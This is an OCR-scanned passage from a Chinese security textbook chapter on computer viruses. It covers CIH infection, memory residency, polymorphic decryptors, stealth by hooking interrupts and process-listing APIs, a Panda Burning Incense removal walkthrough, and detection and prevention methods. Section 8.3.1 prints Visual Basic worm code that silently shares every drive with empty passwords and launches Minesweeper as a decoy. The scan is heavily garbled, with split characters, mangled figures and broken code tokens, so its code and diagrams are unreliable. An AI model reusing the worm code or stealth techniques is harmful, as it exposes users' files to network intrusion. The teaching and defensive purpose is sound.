.text 正 文 段 的 头 -text 正 文 段 的 头 〈 被 修改 ) 

.bss 堆 栈 段 的 头 .bss 堆 栈 段 的 头 〈 被 修改 ) 

.data 数 据 段 的 头 .data 数 据 段 的 头 〈 被 修改 ) 

.rdata 资 源 数据 段 的 头 -rdata 资 源 数据 段 的 头 

… 其 他 段 的 头 … 其 他 段 的 头 

文件 头 上 的 自由 空间 | 病毒 块 角 表 指 多 |] 

CIH 病 毒 首 块 
Er J Ee 
自由 空间 CIH 病 毒 块 2 
| 人 | Eee 
自由 空间 CIH 病 毒 块 3 
本 本 
CIH 病 毒 块 4 
(a) (b) 


图 8-7 CIH 的 空洞 利用 


8.2.2 了 驻 留 技术 


大 部 分 病毒 都 包括 了 内 存 驻 留 的 部 分 ， 当 被 感染 的 文件 执行 之 后 ， 病 毒 的 一 部 分 功能 


模块 过 


1. DOS 环境 下 的 内 存 驻 留 


对 于 标准 的 DOS 的 终止 并 且 驻 留 程序 有 两 种 方法 可 以 使 用 , 一 种 是 通过 CONFIGSYS 
中 作为 设备 驱动 加 载 ; 另外 一 种 是 调用 DOS 中 断 INT21H 的 退出 但 仍然 驻 留 功能 。 但 是 病 
毒 不 是 常规 的 驻 留 程序 ， 通 常会 使 用 更 加 巧妙 的 方法 驻 留 内 存 ， 图 8-8 所 示 为 一 些 病毒 经 


常 隐身 的 地 方 。 


DOS 环境 下 的 内 在 驻 留 病毒 会 修改 大 量 的 DOS INT21H 功能 , 根据 调用 所 处 理 的 文件 


E 入 内 存 ， 并 且 一 直 驻 留 在 那里 ， 即 使 程序 执行 完毕 。 


后 级 名 或 者 文件 类 型 决定 是 否 进行 感染 。 主 要 修改 的 INT21H 功能 包括 : 
。 执行 文件 (EXEC，AX=4B00); 


。 装 入 内 在 (LOAD，AH=4BH); 

。 搜索 〈 列 目录 功能 ) (AH=11h，21h，4Eh，4Fh); 
。 创建 文件 (CREATE, AH=3Ch); 

。 打开 文件 (OPEN，AH=3Dh); 

。 关闭 文件 (CLOSE，AH=3Eh); 

改变 文件 属性 (CHMMODE,，AH=43h); 

。 文件 改名 (RENAME, AH=56h)。 

内 存 驻 留 病毒 在 装 入 内 存 中 之 后 ， 需 要 使 用 一 种 方式 告诉 随后 执行 的 被 感染 文件 ， 内 
存 中 己 经 加 载 了 病毒 代码 ， 不 需要 再 把 病毒 放 到 内 存 中 了 。 有 下 面 几 种 简单 的 方式 可 以 达 
到 这 个 目的 。 

(1) 修改 某 些 中 断 , 增加 一 个 功能 号 , 比如 说 中 断 21H, 增加 一 个 AX=FFFFH 的 调用 ， 
如 果 返 回 1， 表 示 病 毒 存 在 ， 病 毒 不 存在 的 话 ，DOS 会 返回 0。 

(2) 在 一 些 很 少 使 用 的 内 存 区 域 中 ， 放 置 病 毒 存 在 的 标志 。 

有 一 些 内 存 驻 留 病毒 ， 比 如 使 用 病毒 制造 库 生 成 的 病毒 ， 由 于 不 正确 地 实现 了 防止 病 
毒 重新 加 载 的 算法 , 使 病毒 反复 加 载 , 这 样 会 造成 其 中 的 一 个 内 存 驻 留 病毒 不 能 正常 工作 ， 
如 果 加 载 的 次 数 过 多 ， 会 使 系统 内 存 耗 尽 ， 造 成 死机 。 
空闲 区 域 


内 存 块 1 
为 病毒 分 配 的 内 在 块 
内 存 块 2 


为 病毒 分 配 一 块 内 存 


内 存 控制 块 


高 端 内 存 区 域 


空闲 区 域 病毒 代码 


视频 内 在 块 
空闲 区 域 


h 听 向 量 表 
空闲 区 域 


图 8-8 DOS 系统 示意 图 


2. 引导 区 的 内 存 驻 留 

引导 区 内 存 驻 留 程序 使 用 类 似 的 方法 将 病毒 代码 放 入 系统 内 存 中 ， 这 样 会 造成 系统 可 
用 内 存 减 少 。 由 于 引导 病毒 通常 都 比较 小 ， 所 以 一 般 减 少 的 内 存 都 只 有 1KB 或 者 儿 KB。 

为 了 避免 用 户 很 容易 地 觉察 到 系统 可 用 内 存 的 减少 ， 一 些 病毒 会 等 待 DOS 完全 启动 
成 功 , 然后 使 用 DOS 自己 的 功能 分 配 内 存 。 这 样 不 会 显示 整个 可 用 内 存 减 少 , 而 是 在 DOS 
可 用 的 内 存 中 增加 了 一 个 小 的 常 驻 程序 ， 往 往 不 会 引起 用 户 的 警觉 。 

引导 区 内 存 驻 留 程序 往往 不 包括 重 入 检测 部 分 ， 因 为 引导 区 病毒 只 会 在 系统 启动 的 时 
候 加 载 一 次 。 
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3. Windows 环境 下 的 内 存 驻 留 

Windows 环境 下 的 病毒 驻 留 技术 是 在 内 存 中 寻找 合适 的 页 面 并 将 病毒 自身 拷贝 到 其 
中 ， 而 且 在 系统 运行 期 间 能 够 始终 保持 病毒 代码 的 存在 。 进 入 了 核心 态 的 病毒 可 以 利用 系 
统 服务 来 达到 驻 留 内 存 的 目的 ,例如 ,CIH 病毒 调用 INT20 中 断 , 使 用 VxD call Page Allocate 
系统 调用 ， 请 求 系统 分 配 两 个 PAGE 大 小 的 Windows 系统 内 存 ， 用 于 驻 留 病毒 代码 。 处 于 
用 户 态 的 程序 想 要 在 程序 退出 后 仍然 把 关键 代码 驻 留 在 内 存 中 ， 似 乎 是 不 可 能 的 。 因 为 无 
论 用 户 程序 分 配 何 种 内 存 都 将 作为 进程 占用 资源 的 一 部 分 ， 一 旦 进程 结束 ， 所 占 资 源 将 立 
即 被 释放 。 所 以 要 分 配 一 块 进程 退出 后 仍 可 保持 的 内 存 。 


8.2.3 加密 变 形 技术 


随 着 病毒 技术 的 发 展 ， 出 现 了 一 类 新 的 病毒 ， 加 密 病 毒 。 这 类 病毒 的 特点 是 : 其 入 口 
处 具有 解密 子 ， 而 病毒 主体 代码 被 加 密 。 病 毒 运行 时 首先 由 得 到 控制 权 的 解密 代码 对 病毒 
主机 进行 循环 解密 ， 完 成 后 将 控制 交 给 病毒 主机 运行 。 病 毒 主体 感染 文件 时 ， 会 将 解密 子 
用 随机 密 钥 加 密 过 的 病毒 主体 ， 以 及 保存 在 病毒 体内 或 嵌入 解密 子 中 的 密 钥 一 同 写 入 被 感 
梁 文 件 。 但 是 加 密 病毒 不 同 传染 实例 的 解密 子 仍然 保持 不 变 的 机 器 码 明文 ， 所 以 将 特征 码 
选 于 此 处 仍 是 一 种 有 效 的 检测 方法 。 由 于 加 密 病 毒 还 没有 能 够 完全 逃脱 特征 码 扫 描 ， 所 以 
天 才 的 病毒 作者 们 在 加 密 病 毒 的 基础 之 上 进行 改进 ， 使 解密 子 的 代码 对 不 同 传染 实例 呈现 
出 多 样 性 ， 这 就 出 现 了 加 密 变形 病毒 。 它 和 加 密 病 毒 非常 类 似 ， 唯 一 的 改进 在 于 病毒 主体 
在 感染 不 同文 件 时 会 构造 出 一 个 功能 相同 但 代码 不 同 的 解密 子 ， 也 就 是 不 同 传染 实例 的 解 
密 子 具有 相同 的 解密 功能 ， 但 代码 却 截然 不 同 。 比 如 ， 一 条 指令 完全 可 以 拆 成 几 条 来 完成 ， 
中 间 可 能 会 被 插入 无 用 的 垃圾 代码 ， 以 及 使 用 随机 的 寄存 器 、 加 密 长 度 等 。 由 于 无 法 找到 
不 变 的 特征 码 ， 特 征 码 扫 描 技 术 就 彻底 失效 了 。 

图 8-9 所 示 为 一 段 最 简单 的 加 密 变形 病毒 代码 ， 这 段 代 码 的 作用 是 将 预先 加 密 的 病毒 
代码 解密 ， 然 后 跳 转 到 执行 感染 和 破坏 功能 的 病毒 代码 中 。 


MOYV reg_l,count 其 中 ，reg_1、reg_2 和 reg_3 是 从 AX、BX、CX、DX、SI、 
一 w=|DI、BP 中 随机 挑选 的 寄存 器 ， 感 染 不 同 的 文件 ， 解 密 代码 


MO ey 使 用 随机 的 寄存 器 
MoV eT count 是 加 密 数据 的 长 度 ，key 是 加 密 的 密 钥 ，offset 是 加 密 


代码 的 偏 移 量 ， 感 染 的 时 候 ， 这 些 数值 都 是 随机 生成 的 ， 
不 同 的 感染 都 不 一 样 


LOOP 


xxx 是 XOR、ADD 、SUB 等 不 同 运算 指令 的 通称 ， 使 用 什 
xxx byte ptr[reg 3] reg 2 | 一 一 ”| 么 运算 指令 是 感染 的 时 候 随机 选择 


DEC reg 1 
Jxx 是 ja、jnc 等 不 同 条 件 跳 转 指令 的 通称 ， 使 用 什么 跳 转 指 
令 是 感染 的 时 候 随机 选择 的 
a | 一 一 一 ”| 仿 是 感染 的 时 候 随机 进 择 的 
加 密 后 的 病毒 代码 


图 8-9 ”加 密 变形 病毒 代码 


这 段 解密 的 代码 和 加 密 后 的 病毒 都 是 在 感染 的 时 候 动态 生成 的 。 我 们 可 以 看 到 ， 使 用 
的 寄存 器 、 密 钥 、 加 密 代 码 的 长 度 等 ， 甚 至 解密 使 用 的 指令 都 是 随机 的 ， 所 以 指望 能 够 从 
这 些 代码 中 找到 固定 的 病毒 特征 码 是 徒劳 的 ， 也 就 是 由 于 这 种 加 密 变形 病毒 的 出 现 ， 使 利 
用 简单 特征 码 进行 病毒 检测 的 技术 走 到 了 尽头 。 


8.2.4 隐藏 技术 


病毒 在 进入 用 户 系统 之 后 ， 会 采取 种 种 方法 隐藏 自己 的 行踪 ， 让 用 户 无 法 感觉 到 病毒 
的 存在 。 引 导 型 病毒 、 文 件 型 病毒 以 及 Windows 环境 下 的 病毒 采用 了 不 同 的 技术 达到 这 个 
目的 。 

1. 引导 型 病毒 的 隐藏 技术 

引导 型 病毒 的 隐藏 有 两 种 基本 的 方法 : 

(1) 改变 基本 输入 输出 系统 (BIOS) 中断 13H 的 入 口 地 址 ， 使 其 指向 病毒 代码 之 后 ， 
发 现 调 用 INT 13H 读 被 感染 扇 区 的 请 求 的 时 候 ， 将 原来 的 没有 被 感染 过 的 内 容 返 回 给 调用 
的 程序 。 这样 , 任何 DOS 程序 都 无 法 觉察 到 病毒 的 存在 ， 如 果 反 病 毒 软件 无 法 首先 将 内 存 
中 的 病毒 清除 的 话 ， 同 样 无 法 清除 这 种 病毒 。 此 种 隐藏 技术 如 图 8-10 所 示 。 


Dos 应 用 程序 | | _pos 下 的 杀毒 软件 


i 


病毒 感染 后 的 INT 13H 服 务 程序 


读 扇 区 调用 


被 病毒 感染 的 扇 区 呈 原来 的 INT 13H 服 务 程序 


返回 数据 ~ 3 回 Ne 


被 病毒 感染 的 扇 区 的 原始 扇 区 普通 扇 区 普通 扇 区 


图 8-10 引导 型 病毒 的 隐藏 技术 示意 图 


(2) 另外 一 种 更 高 明 的 方法 是 直接 针对 杀毒 软件 的 。 为 了 对 付 上 面 所 说 的 病毒 隐藏 手 
段 ， 一 些 杀毒 软件 采用 直接 对 磁盘 控制 器 进行 操作 的 方法 读 写 磁盘 扇 区 ， 病 毒 的 制造 者 在 
加 载 程序 的 时 候 制造 假象 ， 当 启动 任何 程序 的 时 候 , 修改 DOS 执行 程序 的 中 断 功能 ， 首 先 
把 被 病毒 感染 的 扇 区 恢复 原样 ， 这 样 即使 反 病 毒 程序 采用 直接 磁盘 访问 也 只 能 看 到 正常 的 
磁盘 扇 区 ， 当 程序 执行 完成 后 ， 再 重新 感染 ， 如 图 8-11 所 示 。 对 付 这 种 病毒 的 唯一 方法 是 
在 进行 病毒 检测 之 前 首先 清除 内 存 中 的 所 有 病毒 。 

引导 型 病毒 为 了 隐藏 自己 ， 经 常 采用 更 改 活动 引导 记录 ， 使 病毒 代码 看 起 来 非常 类 似 
于 正常 启动 代码 等 方法 ， 尽 可 能 减少 被 杀毒 软件 发 现 的 可 能 性 。 

2. 文件 型 病毒 的 隐藏 技术 

文件 型 病毒 的 隐藏 技术 和 引导 型 病毒 使 用 的 技术 非 党 类似， 同样 是 蔡 换 DOS 或 者 基 
本 输入 输出 系统 的 文件 系统 相关 调用 ,在 打开 文件 的 时 候 将 文件 的 内 容 恢 复 未 感染 的 状态 ， 
在 关闭 文件 的 时 候 重新 进行 感染 。 
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DOS 命 令 解释 程序 (COMMAND.COM) 


用 户 敲 入 AV.EXE 执 行 反 病毒 程序 | 


感染 后 的 INT 21 功 能 40H (加 载 一 个 程序 执行 ) 


恢复 被 病毒 感染 的 扇 区 为 原来 的 内 容 


站 
原来 的 INT 21H 功 能 


旺 
过 
泥 
注 
加 
区 | 


返回 DOS 命 令 解释 程序 (COMMAND.COM) 


图 8-11 引导 型 病毒 感染 


由 于 访问 文件 型 病毒 的 方式 、 方 法 非常 多 ， 所 以 实现 完全 的 文件 型 病毒 隐藏 是 一 件 非 
常 困 难 的 任务 ， 一 个 完整 的 隐藏 技术 应 该 包括 对 下 面 几 个 方面 的 处 理 ， 如 图 8-12 所 示 。 


INT 13H (直接 磺 盘 访问 ) 隐藏 病毒 房 区 
列 日 录 功 能 | 列 日 录 时 显示 感染 前 的 文件 大 小 
读 写 功能 | 一 ~ 读 写 文件 看 到 正常 的 文件 内 容 
执行 功能 
= 执行 或 者 搜索 时 隐藏 病毒 
其 他 功能 ER 
视窗 操作 系统 下 ， 支 持 长 文件 名 的 扩展 和 
DOS 调 用 | 一 一 一 一 一 一 | 在 支持 长 文件 名 的 系统 隐藏 自身 


图 8-12 文件 型 病毒 


一 般 的 文件 型 病毒 仅仅 使 用 其 中 的 一 部 分 隐藏 技术 。 最 常见 的 是 对 列 目录 进行 隐藏 ， 
这 样 ， 在 使 用 DIR 命令 列 目录 的 时 候 ， 看 到 的 文件 大 小 是 病毒 提供 的 ， 从 实际 大 小 减 去 病 
毒 大 小 的 数值 ， 这 样 就 不 会 感觉 到 病毒 的 存在 。 

3. Windows 环境 下 的 隐藏 技术 

在 Windows 系统 中 ， 有 一 定 经 验 的 用 户 觉察 系统 异常 后 ,常常 使 用 管理 器 进程 列表 来 
观察 是 否 有 异常 进程 的 存在 。 若 存在 ， 则 会 采取 一 定 的 防范 措施 。 因 此 ， 实 现 进程 或 模块 
隐藏 应 该 是 一 个 成 功 病毒 所 必须 具备 的 特征 。 在 Windows 9x 下 ，Kernel32.dll 有 一 个 可 以 
使 进程 从 管理 器 进程 列表 中 消失 的 导出 函数 RegisterServiceProcess， 但 它 仍 不 能 使 病毒 逃 


离 一 些 进程 浏览 工具 的 监视 。 但 当 病 毒 编 写 者 知道 这 些 工具 是 如 何 来 枚 举 进程 的 之 后 ， 也 
找到 对 付 这 些 工 具 的 相应 方法 。 例 如 ， 进 程 浏览 工具 在 Windows 9x 下 ， 大 都 使 用 一 个 
叫做 ToolHelp32.dll 的 动态 链接 库 中 的 Process32First 和 Process32Next 两 个 函数 来 实现 进程 
枚 举 ， 而 在 Windows NT/2000 里 ， 也 有 Psapi.dll 导出 的 EnumProcess 可 用 以 实现 相同 的 功 
E。 所 以 病毒 就 可 以 考虑 修改 这 些 公用 函数 的 部 分 代码 ， 使 之 不 能 返回 特定 进程 的 信息 ， 
从 而 实现 病毒 的 隐藏 。 


8.3 ”计算 机 病毒 实例 


8.3.1 编写 蠕虫 病毒 实例 


1. 用 VB 编制 共享 蠕虫 病毒 的 步骤 

(1) 用 GetDriveType 函数 检测 机 器 从 C 盘 开始 的 所 有 驱动 器 。 

(2) 将 找到 的 每 一 个 驱动 器 后 面 加 上 $ 符 号 作为 一 个 子 键 (C$，D$，ES$)， 写 入 注册 
表 的 LanMan 子 键 下 。 

(3) 将 每 一 个 子 键 的 Flags 值 设置 为 302 十 六 进 制 )。 

(4) 将 Path 设置 成 相应 的 路 径 。 

2. 程序 的 关键 代码 


Option Explicit 


Dim WinDir As String 

Const CommonPath = "SoftWare\Microsoft\WindowsCurrentVersion\Network\ 
LanMan" 

Private Sub Form Load () 


Me.Hide 
Dim buff As String,DriveNo As Integer,Result As Integer,Game 
For DriveNo = 0 To 25 // 遍 历 所 有 的 26 个 驱动 器 
buff = Chr$ (65 + DriveNo) + ":" // 取 驱动 器 符 
Result = GetDriveType (buff) // 调 用 API 函数 来 获得 驱动 器 的 类 型 


If Result = 3 Xor Result = 5 Then 

// 写 入 共享 的 类 型 ， 这 就 是 程序 的 关键 所 在 

setvalue HKEY LOCAL MACHINE,CommonPath + Chr(65+DriveNo)+"$", "Flags", 
REG_DWORD, "770", 3 

setvalue HKEY LOCAL MACHINE,CommonPath + Chr(65+DriveNo)+"$", "Type", 
REG_ DWORD, "0", 0 

// 写 入 共享 驱动 器 的 路 径 ， 就 是 "C:"，"D: "等 

setvalue HKEY_ LOCAL MACHINE, CommonPath + Chr (65 + DriveNo) + "$", "Path", 
REG SZ,buff, 4 

// 写 入 共享 目录 的 只 读 访问 密码 

setvalue HKEY LOCAL MACHINE,CommonPath+Chr (65+DriveNo)+"$", "Parm2enc", 
REG BINARY, 0,0 

// 写 入 该 共享 目录 的 完全 访问 密码 

setvalue HKEY LOCAL MACHINE,CommonPath+Chr (65+DriveNo)+"$", "Parmlenc", 
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REG BINARY, 0, 0 

// 写 入 一 些 注释 信息 ， 比 如 “hello!” 

setvalue HKEY LOCAL MACHINE, CommonPath+Chr (65+DriveNo)+"$","Remark", 
REG SZ, "hello!", 21 

End If 

Next DriveNo 

GetWinDir // 获 得 Windows 目录 的 路 径 

// 如 果 有 扫雷 游戏 的 话 就 在 前 台 执 行 它 

If Dir(WinDir & "winmine. exe") <> "" Then Game =Shell (WinDir & "WINMINE. 
EXE", vbhMaximizedFocus) 

Else 

Game = Shell (WinDir & "explorer", VbMaximizedFocus) 

End If 

Unload Me 

End Sub 

Public Sub GetWinDir() //windows 所 在 目录 的 子 程序 

Dim Length As Long 

WinDir = String(MAX PATH, 0) 

Length = GetWindowsDirectory (WinDir, MAX PATH) 

WinDir = Left (WinDir, InStr(WinDir， Chr(0)) - 1) 
End Sub 


8.3.2 ”熊猫 烧香 病毒 的 查 欠 


1. 能 猫 烧香 病毒 介绍 

熊猫 烧香 病毒 破坏 性 极 大 ， 运 行 后 将 自身 伪装 成 与 系统 进程 极其 相似 的 进程 ， 以 欺骗 
用 户 ， 并 通过 添加 注册 表 项 实现 开机 自 启动 。 能 猫 烧 香 能 够 感染 硬盘 中 的 所 有 .exe、.com 
文件 等 可 执行 文件 ， 并 将 被 感染 .exe 文件 的 图 标 改 为 一 只 捧 了 三 根 香 的 熊猫 ， 该 病毒 也 因 
此 得 名 。 此 外 ， 能 猫 烧 香 还 将 删除 后 级 名 为 .gho 的 Ghost 备份 文件 ， 防 止 用 户 恢复 系统 。 
该 病毒 还 修改 所 有 本 机 上 的 网 页 文件 ， 添 加 特定 语句 以 实现 连接 到 指定 网 站 ， 从 而 下 载 其 
他 恶意 软件 。 同 时 病毒 运行 后 枚 举 内 网 的 所 有 可 用 共享 ， 并 尝试 通过 弱 口 令 方 式 感染 局 域 
网 内 的 其 他 计算 机 。 能 猫 烧香 还 通过 在 每 个 磁盘 的 根 目 录 下 复制 其 可 执行 文件 的 建立 
autorun.ini 文件 以 实现 用 户 双击 访问 该 磁盘 时 自动 运行 。 
熊猫 烧香 主要 通过 共享 文件 夹 、 文 件 捆绑 、 运 行 染 毒 程序 、 点 击 染 毒 邮件 附件 等 方式 
进行 传播 ， 传 播 速 度 非常 快 。 此 外 ， 该 病毒 的 变种 非常 多 ， 更 新 也 很 快 ， 令 广大 计算 机 用 
户 防不胜防 。 

2. 查 杀 熊猫 烧香 步骤 

1) 观察 熊猫 烧香 病毒 的 中 毒 症状 

中 熊猫 烧香 病毒 后 会 发 现 系 统 运行 速度 明显 变 慢 ， 但 是 ， 此 时 如 果 试图 打开 任务 管理 
器 会 发 现任 务 管理 器 的 界面 一 办 就 消失 了 ， 根 本 无 法 正常 使 用 。 除 此 之 外 ， 企 图 运行 注册 
表 编 辑 器 和 一 些 主流 安全 软件 时 也 会 出 现 相同 的 情况 。 此 时 ， 可 以 将 任务 管理 器 进行 重 命 
名 操作 ， 命 令 如 图 8-13 所 示 ， 复 制 任务 管理 器 程序 并 重 命名 为 task.exe， 复 制 成 功 后 ， 执 


行 task.exe 就 相当 于 执行 任务 管理 器 程序 。 


选 定 C:\WINNT\System32\cmd.exe 
C:\WINNT\S 
已 复制 


C:\WINNT\system32> 


ystem32>copy taskmgr .exe task.exe 
1 个 支 和 . 


图 8-13 复制 任务 管理 器 程序 


2) 结束 熊猫 病毒 进程 
打开 任务 管理 器 ， 会 发 现 可 疑 进程 ncscv32.exe， 如 图 8-14 所 示 。 将 此 进程 结束 。 


旦 windows 任务 管理 器 
交 件 (E) 选项 (0) 查看 (WD 帮助 (中 


‘svchost. exe 
llssrv. exe 
regsve. exe 
termsrv. exe 
VwareService.e 
Wins. exe 

dns. exe 
inetinfo. exe 
Dfssve. exe 
Explorer. exe 
VihwareTray. exe 
Vhwarelser. exe 
internat. exe 
conime. exe 
task. exe 

cmd. exe 


加 =esesesseseeseseseesee 
38888888888888888 


厂 显示 所 有 用 户 的 进程 @) 


10, 128 K 
1, 336 Kk 
2, 836 K 

1 512 k 
1,784 kK 

1,284 K 
1,000 k 

2,156 kK 


KK 


进程 娄 ; 29 CPU 使 用 ; 33% | 内 存 使 用 : 97420k 1 311080K Zz 
图 8-14 ”结束 熊猫 烧香 进程 


3) 删除 熊猫 烧香 病毒 文件 
搜索 熊猫 烧香 病毒 文件 ， 在 系统 目录 下 的 drivers 目录 中 ， 将 该 文件 删除 ， 命 令 如 


图 8-15 所 示 。 


ce CA\WINNT\System32\cmd.exe 


C:\WINNT\system32>cd driuers 


C:\WINNT\system32\drivers> 


C:\WINNT\system32\drivers>del ncscu32 .exe 


图 8-15 删除 熊猫 烧香 文件 
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至 此 ， 熊 猫 烧香 病毒 文件 已 经 被 清除 了 ， 但 是 ， 系 统 中 还 有 许多 被 感染 的 文件 ， 一 旦 
运行 这 些 文件 仍然 会 使 病毒 再 次 发 作 ， 因 此 ， 还 需要 对 这 些 被 感染 文件 进行 修复 ， 这 项 工 
作 可 以 通过 升级 到 最 新 版 本 的 反 病毒 软件 进行 修复 。 


8.4 计算 机 病毒 的 检测 与 防范 


由 于 计算 机 病毒 具有 相当 的 复杂 性 和 行为 不 确定 性 ， 计 算 机 病毒 的 检测 与 防范 需要 多 
种 技术 综合 应 用 。 


8.4.1 计算 机 病毒 的 检测 


计算 机 病毒 对 系统 的 破坏 离 不 开 当 前 计算 机 的 资源 和 技术 水 平 。 对 病毒 的 检测 主要 从 
检查 系统 资源 的 异常 情况 入 手 ， 逐 步 深 入 。 

1. 异常 情况 判断 

在 计算 机 工作 时 ， 如 出 现下 列 异 常 现象 ， 则 有 可 能 感染 了 病毒 。 

(1) 屏幕 出 现 异 常 图 形 或 画面 ， 这 些 画 面 可 能 是 一 些 鬼怪 ， 也 可 能 是 一 些 下 落 的 雨点 、 
字符 、 树 叶 等 ， 并 且 系 统 很 难 退 出 或 恢复 。 

(2) 扬声器 发 出 与 正常 操作 无 关 的 声音 ， 如 演奏 乐曲 或 是 随意 组 合 的 、 杂 乱 的 声音 。 

(3) 磁盘 可 用 空间 减少 ， 出 现 大 量 坏 复 ， 且 坏 复数 目 不 断 增多 ， 直 到 无 法 继续 工作 。 

(4) 硬盘 不 能 引导 系统 。 

(5) 磁盘 上 的 文件 或 程序 丢失 。 

(6) 人 磁盘 读 / 写 文件 明显 变 慢 ， 访 问 的 时 间 加 长 。 

(7) 系统 引导 变 慢 或 出 现 问 题 ， 有 的 出 现 “ 写 保护 错误 ”提示 。 

(8) 系统 经 常 死 机 或 出 现 异 常 的 重启 现象 。 

(9) 程序 突然 不 能 运行 ， 总 是 出 现 出 错 提示 。 

(10) 连接 的 打印 机 不 能 正常 启动 。 

观察 上 述 异 常情 况 后 ， 可 初步 判断 系统 的 哪 部 分 资源 受到 病毒 侵袭 ， 为 进一步 诊断 和 
清除 做 好 准备 。 

2. 检测 的 主要 依据 

1) 检查 磁盘 主 引导 扁 区 

硬盘 的 主 引导 扇 区 、 分 区 表 以 及 文件 分 配 表 、 文 件 目录 区 是 病毒 攻击 的 主要 目录 。 

2) 检查 FAT 表 

病毒 隐藏 在 磁盘 上 ， 一 般 要 对 存放 的 位 置 做 出 “ 坏 复 ”信息 标志 反映 在 FAT 表 中 。 

3) 检查 中 断 向 量 

病毒 隐藏 和 激活 一 般 是 采用 中 断 的 方法 ， 即 修改 中 断 向 量 ， 使 系统 在 适当 时 候 转 向 执 
行 病毒 代码 ， 病 毒 代 码 执 行 后 ， 再 转 回 到 原 中 断 处 理 程序 执行 。 因 此 ， 可 通过 检查 中 断 向 
量 有 无 变化 来 确定 是 否 感 染 了 病毒 。 

4) 检查 可 执行 文件 

检查 COM 或 EXE 可 执行 文件 的 内 容 、 长 度 、 属 性 等 ， 可 判断 是 否 感 染 了 病毒 。 检 查 
可 执行 文件 的 重点 是 在 这 些 程序 的 头 部 即 前 面 的 20 字 节 左右 , 因为 病毒 主要 改变 文件 的 起 


始 部 分 。 

5) 检查 内 存 空间 

计算 机 病毒 在 传染 或 执行 时 ， 必 然 会 占据 一 定 的 内 存 空间 ， 并 驻 留 在 内 存 中 ， 等 待 时 
机 再 进行 传染 或 攻击 。 病 毒 占用 的 内 存 空 间 一 般 是 用 户 不 能 覆盖 的 ， 因 此 ， 可 以 通过 检查 
内 存 的 大 小 和 内 存 中 的 数据 来 判断 是 否 有 病毒 。 

6) 检查 特征 串 

一 些 经 常 出 现 的 病毒 具有 明显 的 特征 ， 即 有 特殊 的 字符 串 。 根 据 它们 的 特征 ， 可 通过 
工具 软件 检查 、 搜 索 ， 以 确定 病毒 的 存在 和 种 类 。 

3. 计算 机 病毒 的 检测 手段 

1) 特征 代码 法 

特征 代码 法 的 实现 步骤 如 下 : 

(1) 采集 已 知 病毒 样本 ， 病 毒 如 果 既 感染 COM 文件 ， 又 感染 EXE 文件 ， 对 这 种 病毒 
要 同时 采集 COM 型 病毒 样本 和 EXE 型 病毒 样本 。 

(2) 在 病毒 样本 中 ， 抽 取 特 征 代码 。 

(3) 打开 被 检测 文件 ， 在 文件 中 搜索 ， 检 查 文件 中 是 否 含有 病毒 数据 库 中 的 病毒 特征 
代码 ， 如 果 发 现 病毒 特征 代码 ， 由 于 特征 代码 与 病毒 一 一 对 应 ， 便 可 以 断定 ， 被 查 文件 中 
感染 何 种 病毒 。 

特征 代码 法 的 特点 : 速度 慢 ， 随 着 病毒 种 类 的 增多 ， 检 索 时 间 变 长 ， 误 报 率 低 ; 不 能 
检查 多 形 性 病毒 ， 不 能 对 付 隐藏 性 病毒 。 

2) 校 验 和 法 

运用 校 验 和 法 查 病 毒 采 用 三 种 方式 : 

(1) 在 检测 病毒 工具 中 纳入 校 验 和 法 ， 对 被 查 的 对 象 文件 计算 其 正常 状态 的 校 验 和 ， 
将 校 验 和 值 写 入 被 查 文件 中 检测 工具 中 ， 而 后 进行 比较 。 

(2) 在 应 用 程序 中 ， 放 入 校 验 和 法 自我 检查 功能 ， 将 文件 正常 状态 的 校 验 和 写 入 文件 
本 身 中 ， 每 当 应 用 程序 启动 时 ， 比 较 现行 校 验 和 与 原 校 验 和 值 ， 实 现 应 用 程序 的 自 检测 。 

(3) 将 校 验 和 检查 程序 常 驻 内 存 ， 每 当 应 用 程序 开始 运行 时 ， 自 动 比较 检查 应 用 程序 
内 部 或 别 的 文件 中 预先 保存 的 校 验 和 。 

校 验 和 法 的 特点 : 方法 简单 能 发 现 未 知 病毒 ， 被 查 文件 的 细微 变化 也 能 发 现 ; 会 报警 ; 
不 能 识别 病毒 名 称 ; 不 能 对 付 隐 藏 型 病毒 。 

3) 行为 监测 法 

利用 病毒 的 特有 行为 特征 来 监测 病毒 的 方法 ， 称 为 行为 监测 法 。 通 过 对 病毒 多 年 的 观 
察 和 研究 ， 有 一 些 行为 是 病毒 的 共同 行为 ， 而 且 比较 特殊 。 在 正常 程序 中 ， 这 些 行为 比较 
罕见 ， 当 程序 运行 时 ， 监 视 其 行为 ， 如 果 发 现 了 病毒 行为 ， 立 即 报警 。 

行为 监测 法 的 特点 : 可 发 现 未 知 病毒 ， 可 相当 准确 地 预报 未 知 的 多 数 病毒 ， 可 能 误 报 
警 ;不 能 识别 病毒 名 称 ; 实现 时 有 一 定 难 度 。 

4) 软件 模拟 法 

软件 模拟 法 是 一 种 软件 分 析 器 ， 用 软件 方法 来 模拟 和 分 析 程 序 的 运行 。 新 型 检测 工具 
纳入 了 软件 模拟 法 ， 该 类 工具 开始 运行 时 ， 使 用 特征 代码 法 检测 病毒 ， 如 果 发 现 隐藏 病毒 
或 多 态 性 病毒 嫌疑 时 ， 启 动 软件 模拟 模块 ， 监 视 病毒 的 运行 ， 待 病毒 自身 的 密码 译 码 以 后 ， 
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再 运用 特征 代码 法 来 识别 病毒 的 种 类 。 
8.4.2 ”计算 机 病毒 的 防范 


1 于 在 计算 机 病毒 的 处 理 过 程 中 , 存在 对 症 下 药 的 问题 , 即 只 能 是 发 现 一 种 病毒 以 后 ， 
才 可 以 找到 相应 的 治疗 方法 ， 因 此 具有 很 大 的 被 动 性 。 而 防范 计算 机 病毒 ， 则 可 掌握 工作 
的 主动 权 ， 重 点 应 放 在 计算 机 病毒 的 预防 上 。 防 范 计算 机 病毒 主要 从 管理 和 技术 两 方面 
着 手 。 

1. 严格 的 管理 

制定 相应 的 管理 制度 ， 吕 免 蔷 意 制造 、 传 播 病 毒 的 事件 发 生 。 例 如 ， 对 接触 重要 计算 
机 系统 的 人 员 进行 选择 和 审查 ， 对 系统 的 工作 人 员 和 资源 进行 访问 权限 划分 ， 对 外 来 人 员 
上 机 或 外 来 磁盘 的 使 用 严格 限制 ， 特 别 是 不 准 用 外 来 系统 盘 启动 系统 ， 不 准 随意 玩 游戏 ; 
规定 下 载 的 文件 要 经 过 严格 检查 ， 有 时 还 规定 下 载 文件 、 接 收 E-mail 等 需要 使 用 专门 的 终 
端 和 账号 ， 接 收 到 的 程序 要 严格 限制 执行 等 。 

2 有效 的 技术 

除 管理 方面 的 措施 外 ， 采 取 有 效 的 技术 措施 防止 计算 机 病毒 的 感染 和 蔓延 也 是 十 分 重 
